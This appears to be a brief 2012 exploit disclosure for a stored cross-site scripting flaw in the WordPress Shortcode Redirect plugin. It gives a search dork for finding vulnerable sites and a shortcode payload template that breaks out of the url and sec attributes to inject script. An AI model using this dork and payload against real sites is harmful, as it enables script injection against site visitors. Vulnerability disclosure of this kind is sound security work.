# Exploit Title: Wordpress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18 
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01

1)  You need permissions to write a post (HTML mode) to exploit the shortcode:

    [redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']